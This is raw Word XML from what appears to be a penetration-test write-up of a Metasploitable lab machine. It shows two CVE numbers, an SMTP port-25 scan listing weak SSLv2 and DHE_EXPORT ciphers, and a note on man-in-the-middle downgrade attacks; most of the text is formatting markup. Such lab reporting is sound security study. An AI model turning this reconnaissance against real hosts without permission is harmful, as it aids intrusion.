    <w:p w14:paraId="652BA9A8" w14:textId="77777777" w:rsidR="00AA4582" w:rsidRDefault="00AA4582" w:rsidP="00AA4582">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cve: CVE-2016-6531</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C47F267" w14:textId="57188D5D" w:rsidR="00AA4582" w:rsidRDefault="00AA4582" w:rsidP="00AA4582">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cve: CVE-2018-15719</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641BD93F" w14:textId="10BD0398" w:rsidR="00F056A1" w:rsidRDefault="00F056A1" w:rsidP="00F056A1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc155092384"/>
      <w:r>
        <w:t>Port 25</w:t>
      </w:r>
      <w:r w:rsidR="005B1C9C">
        <w:t xml:space="preserve"> SMTP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="6964C836" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A61C224" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>|_ssl-date: 2024-01-02T09:58:53+00:00; +1s from scanner time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361C8F3" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0967055F" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>| Not valid before: 2010-03-17T14:07:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5045C0FD" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>|_Not valid after:  2010-04-16T14:07:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F097B96" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t xml:space="preserve">| sslv2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D6DC85" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>|   SSLv2 supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D6A88A" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t xml:space="preserve">|   ciphers: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100CA840" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>|     SSL2_RC2_128_CBC_WITH_MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509F6B3A" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>|     SSL2_DES_192_EDE3_CBC_WITH_MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE170F5" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>|     SSL2_RC4_128_EXPORT40_WITH_MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B71528" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB39B89" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>|     SSL2_DES_64_CBC_WITH_MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE2CD95" w14:textId="77777777" w:rsidR="006B4444" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>|_    SSL2_RC4_128_WITH_MD5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F056A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5C7F7E" w14:textId="29CD1D1E" w:rsidR="00F056A1" w:rsidRDefault="00F056A1" w:rsidP="003E7196">
      <w:r w:rsidRPr="00F056A1">
        <w:t>This host is accepting 'DHE_EXPORT' cipher suites and is prone to man in the middle attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B65670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SSLv3 protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2E744C"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7D307201"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46928DDE"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TLS_DH_anon_EXPORT_WITH_RC4_40_MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F596113"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'DHE_EXPORT' cipher suites accepted by this service via the TLSv1.0 protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EE1788"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TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2309792D" w14:textId="77777777" w:rsidR="00A2599A" w:rsidRDefault="00A2599A" w:rsidP="00A2599A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6447E9" w14:textId="3D7A72BD" w:rsidR="00A2599A" w:rsidRDefault="00A2599A" w:rsidP="00A2599A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TLS_DH_anon_EXPORT_WITH_RC4_40_MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457B169D"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lastRenderedPageBreak/>
        <w:t>Successful exploitation will allow a man-in-the-middle attacker to downgrade the security of a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1F53B6" w14:textId="77777777" w:rsidR="00A2599A" w:rsidRDefault="00A2599A" w:rsidP="00A2599A">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TLS session to 512-bit export-grade cryptography, which is signi_cantly weaker, allowing the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D897F" w14:textId="32DB3C51" w:rsidR="00A2599A" w:rsidRPr="00231879" w:rsidRDefault="00A2599A" w:rsidP="00A2599A">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attacker to more easily break the encryption and monitor or tamper with the encrypted stream.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A2599A" w:rsidRPr="0023187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56">
    <w:altName w:val="Calibri"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="F37">
    <w:altName w:val="Calibri"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="F53">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0CC473D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57C6C6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85939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C48"/>
    <w:rsid w:val="00011CAD"/>
    <w:rsid w:val="00012388"/>
    <w:rsid w:val="000212CA"/>
    <w:rsid w:val="00026B0A"/>
    <w:rsid w:val="000308AC"/>
    <w:rsid w:val="00050E8D"/>
    <w:rsid w:val="000520F2"/>
    <w:rsid w:val="0005303B"/>
    <w:rsid w:val="00053765"/>
    <w:rsid w:val="00062B58"/>
    <w:rsid w:val="000828E0"/>
    <w:rsid w:val="00084769"/>
    <w:rsid w:val="00096473"/>
    <w:rsid w:val="000A0996"/>
    <w:rsid w:val="000E75D2"/>
    <w:rsid w:val="000F091D"/>
    <w:rsid w:val="00101BC7"/>
    <w:rsid w:val="0011222E"/>
    <w:rsid w:val="001124F8"/>
    <w:rsid w:val="00115C0E"/>
    <w:rsid w:val="0012652E"/>
    <w:rsid w:val="00137E89"/>
    <w:rsid w:val="00140FA3"/>
    <w:rsid w:val="001419EA"/>
    <w:rsid w:val="00142AB4"/>
    <w:rsid w:val="0014407D"/>
    <w:rsid w:val="001563F3"/>
    <w:rsid w:val="0016718B"/>
    <w:rsid w:val="001734D6"/>
    <w:rsid w:val="0017668D"/>
    <w:rsid w:val="00181A83"/>
    <w:rsid w:val="00190C6A"/>
    <w:rsid w:val="00192B26"/>
    <w:rsid w:val="00195F62"/>
    <w:rsid w:val="001B0F39"/>
    <w:rsid w:val="001B7057"/>
    <w:rsid w:val="001E05FC"/>
    <w:rsid w:val="001E446A"/>
    <w:rsid w:val="001F694B"/>
    <w:rsid w:val="00204001"/>
    <w:rsid w:val="00205FA7"/>
    <w:rsid w:val="002119E7"/>
    <w:rsid w:val="002302DD"/>
    <w:rsid w:val="00231879"/>
    <w:rsid w:val="00233507"/>
    <w:rsid w:val="00240DBF"/>
    <w:rsid w:val="00241320"/>
    <w:rsid w:val="002415C7"/>
    <w:rsid w:val="00242AF9"/>
    <w:rsid w:val="00244791"/>
    <w:rsid w:val="00252A5D"/>
    <w:rsid w:val="00253760"/>
    <w:rsid w:val="00254EC9"/>
    <w:rsid w:val="0025562C"/>
    <w:rsid w:val="00266BE8"/>
    <w:rsid w:val="002678B2"/>
    <w:rsid w:val="00271199"/>
    <w:rsid w:val="002A63CB"/>
    <w:rsid w:val="002B73F5"/>
    <w:rsid w:val="002C1C1C"/>
    <w:rsid w:val="002C41B1"/>
    <w:rsid w:val="002D6A4C"/>
    <w:rsid w:val="002F07FC"/>
    <w:rsid w:val="002F504E"/>
    <w:rsid w:val="002F5473"/>
    <w:rsid w:val="002F6D85"/>
    <w:rsid w:val="002F7A99"/>
    <w:rsid w:val="00313769"/>
    <w:rsid w:val="00321109"/>
    <w:rsid w:val="00333131"/>
    <w:rsid w:val="003373D1"/>
    <w:rsid w:val="00347CDD"/>
    <w:rsid w:val="00384326"/>
    <w:rsid w:val="00393B96"/>
    <w:rsid w:val="003A36CC"/>
    <w:rsid w:val="003A3D15"/>
    <w:rsid w:val="003B2623"/>
    <w:rsid w:val="003B5EC8"/>
    <w:rsid w:val="003C24C7"/>
    <w:rsid w:val="003E2586"/>
    <w:rsid w:val="003E6FBA"/>
    <w:rsid w:val="003E7196"/>
    <w:rsid w:val="00405ED6"/>
    <w:rsid w:val="00411220"/>
    <w:rsid w:val="00426120"/>
    <w:rsid w:val="00433EE2"/>
    <w:rsid w:val="004417A4"/>
    <w:rsid w:val="00460C48"/>
    <w:rsid w:val="00461B33"/>
    <w:rsid w:val="004872DF"/>
    <w:rsid w:val="00492F17"/>
    <w:rsid w:val="00495A6A"/>
    <w:rsid w:val="004A3182"/>
    <w:rsid w:val="004B0430"/>
    <w:rsid w:val="004B637A"/>
    <w:rsid w:val="004D025B"/>
    <w:rsid w:val="004D332E"/>
    <w:rsid w:val="004E6E8E"/>
    <w:rsid w:val="00501528"/>
    <w:rsid w:val="005017F8"/>
    <w:rsid w:val="00511F27"/>
    <w:rsid w:val="0052288E"/>
    <w:rsid w:val="005231AC"/>
    <w:rsid w:val="005277C9"/>
    <w:rsid w:val="0053065B"/>
    <w:rsid w:val="00531359"/>
    <w:rsid w:val="00545F98"/>
    <w:rsid w:val="005725A9"/>
    <w:rsid w:val="0057637D"/>
    <w:rsid w:val="00580FC9"/>
    <w:rsid w:val="00594B23"/>
    <w:rsid w:val="005A6B1E"/>
    <w:rsid w:val="005A7850"/>
    <w:rsid w:val="005B1C9C"/>
    <w:rsid w:val="005B2E1D"/>
    <w:rsid w:val="005C50C3"/>
    <w:rsid w:val="005E0814"/>
    <w:rsid w:val="005F4C76"/>
    <w:rsid w:val="005F602F"/>
    <w:rsid w:val="00607B81"/>
    <w:rsid w:val="00620BAC"/>
    <w:rsid w:val="00622A22"/>
    <w:rsid w:val="00636FD3"/>
    <w:rsid w:val="00665A54"/>
    <w:rsid w:val="006677D6"/>
    <w:rsid w:val="006706AD"/>
    <w:rsid w:val="00681735"/>
    <w:rsid w:val="00684BC6"/>
    <w:rsid w:val="006972C5"/>
    <w:rsid w:val="006A30D1"/>
    <w:rsid w:val="006A7485"/>
    <w:rsid w:val="006A7AF2"/>
    <w:rsid w:val="006A7D72"/>
    <w:rsid w:val="006B4444"/>
    <w:rsid w:val="006C129D"/>
    <w:rsid w:val="006D55D0"/>
    <w:rsid w:val="006D5BFF"/>
    <w:rsid w:val="00704CCF"/>
    <w:rsid w:val="00706A19"/>
    <w:rsid w:val="00734F0B"/>
    <w:rsid w:val="00741970"/>
    <w:rsid w:val="00742104"/>
    <w:rsid w:val="0074482D"/>
    <w:rsid w:val="0074513C"/>
    <w:rsid w:val="007535CE"/>
    <w:rsid w:val="00754B34"/>
    <w:rsid w:val="007668BF"/>
    <w:rsid w:val="007739F9"/>
    <w:rsid w:val="007760B5"/>
    <w:rsid w:val="00792A92"/>
    <w:rsid w:val="007A110C"/>
    <w:rsid w:val="007A5D93"/>
    <w:rsid w:val="007B327D"/>
    <w:rsid w:val="007C077A"/>
    <w:rsid w:val="007C44ED"/>
    <w:rsid w:val="007D0855"/>
    <w:rsid w:val="007D2B9F"/>
    <w:rsid w:val="007E0B6E"/>
    <w:rsid w:val="007E16ED"/>
    <w:rsid w:val="007E20E5"/>
    <w:rsid w:val="007F3821"/>
    <w:rsid w:val="007F500D"/>
    <w:rsid w:val="007F7093"/>
    <w:rsid w:val="007F7E46"/>
    <w:rsid w:val="0080133C"/>
    <w:rsid w:val="0080197A"/>
    <w:rsid w:val="00807352"/>
    <w:rsid w:val="008121E5"/>
    <w:rsid w:val="0082504B"/>
    <w:rsid w:val="008314C5"/>
    <w:rsid w:val="00833660"/>
    <w:rsid w:val="00833738"/>
    <w:rsid w:val="00837F9F"/>
    <w:rsid w:val="00852076"/>
    <w:rsid w:val="008554BD"/>
    <w:rsid w:val="00856C90"/>
    <w:rsid w:val="00860812"/>
    <w:rsid w:val="0086149A"/>
    <w:rsid w:val="008745C5"/>
    <w:rsid w:val="0088687B"/>
    <w:rsid w:val="0089054D"/>
    <w:rsid w:val="00894A1A"/>
    <w:rsid w:val="008A7F30"/>
    <w:rsid w:val="008B6AC2"/>
    <w:rsid w:val="008B6BEB"/>
    <w:rsid w:val="008B708C"/>
    <w:rsid w:val="008C302A"/>
    <w:rsid w:val="008E1FB7"/>
    <w:rsid w:val="008E4971"/>
    <w:rsid w:val="008E51FC"/>
    <w:rsid w:val="008F653F"/>
    <w:rsid w:val="00902F3F"/>
    <w:rsid w:val="009337A3"/>
    <w:rsid w:val="009337DE"/>
    <w:rsid w:val="00954F70"/>
    <w:rsid w:val="009664C3"/>
    <w:rsid w:val="00983F34"/>
    <w:rsid w:val="00994E96"/>
    <w:rsid w:val="009973A1"/>
    <w:rsid w:val="009A01E6"/>
    <w:rsid w:val="009A0D15"/>
    <w:rsid w:val="009A65C2"/>
    <w:rsid w:val="009B2A1F"/>
    <w:rsid w:val="009D1027"/>
    <w:rsid w:val="009D555B"/>
    <w:rsid w:val="009E6717"/>
    <w:rsid w:val="009E78F3"/>
    <w:rsid w:val="009E7FFD"/>
    <w:rsid w:val="009F2B48"/>
    <w:rsid w:val="00A0433A"/>
    <w:rsid w:val="00A219A9"/>
    <w:rsid w:val="00A21FEE"/>
    <w:rsid w:val="00A2599A"/>
    <w:rsid w:val="00A26A54"/>
    <w:rsid w:val="00A30562"/>
    <w:rsid w:val="00A315C1"/>
    <w:rsid w:val="00A451C2"/>
    <w:rsid w:val="00A52060"/>
    <w:rsid w:val="00A55419"/>
    <w:rsid w:val="00A617C5"/>
    <w:rsid w:val="00A65189"/>
    <w:rsid w:val="00A70977"/>
    <w:rsid w:val="00A7228D"/>
    <w:rsid w:val="00A815E3"/>
    <w:rsid w:val="00A93DE3"/>
    <w:rsid w:val="00A94847"/>
    <w:rsid w:val="00AA0FF2"/>
    <w:rsid w:val="00AA2FF3"/>
    <w:rsid w:val="00AA4582"/>
    <w:rsid w:val="00AA7107"/>
    <w:rsid w:val="00AA7712"/>
    <w:rsid w:val="00AB4A6A"/>
    <w:rsid w:val="00AB69C6"/>
    <w:rsid w:val="00AE72C7"/>
    <w:rsid w:val="00AF1CC6"/>
    <w:rsid w:val="00AF4A33"/>
    <w:rsid w:val="00AF60CC"/>
    <w:rsid w:val="00B2433C"/>
    <w:rsid w:val="00B25B9B"/>
    <w:rsid w:val="00B323E0"/>
    <w:rsid w:val="00B33A9D"/>
    <w:rsid w:val="00B4294D"/>
    <w:rsid w:val="00B65EFC"/>
    <w:rsid w:val="00B72D0D"/>
    <w:rsid w:val="00B867F4"/>
    <w:rsid w:val="00B9433B"/>
    <w:rsid w:val="00B977A1"/>
    <w:rsid w:val="00BA7D80"/>
    <w:rsid w:val="00BB514E"/>
    <w:rsid w:val="00BB5E2C"/>
    <w:rsid w:val="00BD308A"/>
    <w:rsid w:val="00BF2140"/>
    <w:rsid w:val="00BF414F"/>
    <w:rsid w:val="00BF4B2F"/>
    <w:rsid w:val="00C02EC4"/>
    <w:rsid w:val="00C107DA"/>
    <w:rsid w:val="00C2401A"/>
    <w:rsid w:val="00C26EB7"/>
    <w:rsid w:val="00C35A64"/>
    <w:rsid w:val="00C4744C"/>
    <w:rsid w:val="00C512CD"/>
    <w:rsid w:val="00C54FD3"/>
    <w:rsid w:val="00C643A5"/>
    <w:rsid w:val="00C90525"/>
    <w:rsid w:val="00CA1453"/>
    <w:rsid w:val="00CB77C5"/>
    <w:rsid w:val="00CD2270"/>
    <w:rsid w:val="00CE06FA"/>
    <w:rsid w:val="00CE3F82"/>
    <w:rsid w:val="00CE4DA1"/>
    <w:rsid w:val="00CE59DA"/>
    <w:rsid w:val="00D01E10"/>
    <w:rsid w:val="00D0622F"/>
    <w:rsid w:val="00D13179"/>
    <w:rsid w:val="00D159D6"/>
    <w:rsid w:val="00D20B66"/>
    <w:rsid w:val="00D308AE"/>
    <w:rsid w:val="00D316B5"/>
    <w:rsid w:val="00D33E15"/>
    <w:rsid w:val="00D70A3E"/>
    <w:rsid w:val="00D76D9B"/>
    <w:rsid w:val="00D77F85"/>
    <w:rsid w:val="00D80837"/>
    <w:rsid w:val="00D80D9B"/>
    <w:rsid w:val="00D93FF2"/>
    <w:rsid w:val="00DB6252"/>
    <w:rsid w:val="00DC416D"/>
    <w:rsid w:val="00DC51D3"/>
    <w:rsid w:val="00DD210A"/>
    <w:rsid w:val="00DF475F"/>
    <w:rsid w:val="00DF50CE"/>
    <w:rsid w:val="00E01F34"/>
    <w:rsid w:val="00E05828"/>
    <w:rsid w:val="00E17435"/>
    <w:rsid w:val="00E20F61"/>
    <w:rsid w:val="00E40502"/>
    <w:rsid w:val="00E442FB"/>
    <w:rsid w:val="00E53903"/>
    <w:rsid w:val="00E54950"/>
    <w:rsid w:val="00E7387F"/>
    <w:rsid w:val="00E864BE"/>
    <w:rsid w:val="00EB0EB8"/>
    <w:rsid w:val="00EB3CAD"/>
    <w:rsid w:val="00EC191C"/>
    <w:rsid w:val="00ED0FA5"/>
    <w:rsid w:val="00ED1437"/>
    <w:rsid w:val="00EE7E34"/>
    <w:rsid w:val="00EF129C"/>
    <w:rsid w:val="00EF13B8"/>
    <w:rsid w:val="00EF5DF7"/>
    <w:rsid w:val="00EF6A43"/>
    <w:rsid w:val="00F031D2"/>
    <w:rsid w:val="00F05071"/>
    <w:rsid w:val="00F056A1"/>
    <w:rsid w:val="00F05F95"/>
    <w:rsid w:val="00F205D5"/>
    <w:rsid w:val="00F249B5"/>
    <w:rsid w:val="00F34884"/>
    <w:rsid w:val="00F35E63"/>
    <w:rsid w:val="00F42691"/>
    <w:rsid w:val="00F519AB"/>
    <w:rsid w:val="00F54D0B"/>
    <w:rsid w:val="00F561E8"/>
    <w:rsid w:val="00F605F9"/>
    <w:rsid w:val="00F7538A"/>
    <w:rsid w:val="00F85A44"/>
    <w:rsid w:val="00FA3977"/>
    <w:rsid w:val="00FB0980"/>
    <w:rsid w:val="00FB3914"/>
    <w:rsid w:val="00FB5467"/>
    <w:rsid w:val="00FC25AD"/>
    <w:rsid w:val="00FC27B6"/>
    <w:rsid w:val="00FE3321"/>
    <w:rsid w:val="00FF55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7636C4A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{628C5BD1-045E-4900-9D91-24803661C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0E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11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65C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460C48"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00460C48"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid0">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00460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0C48"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00460C48"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00050E8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11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65C2"/>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012388"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00012388"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00C54FD3"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002302DD"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B2433C"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="000212C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2C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5.jpe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jpg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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jpeg"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.jpg"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/topics/capture-the-flag/metasploitable-1-walkthrough/" TargetMode="Externa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6.jpeg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.emf"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.jpg"/><Relationship Id="rId85"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4.jpeg"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.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resources.infosecinstitute.com/topics/capture-the-flag/metasploitable-2-walkthrough/"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jpeg"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId10"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0.jpeg"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:root@192.168.254.186" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpg"/><Relationship Id="rId78" 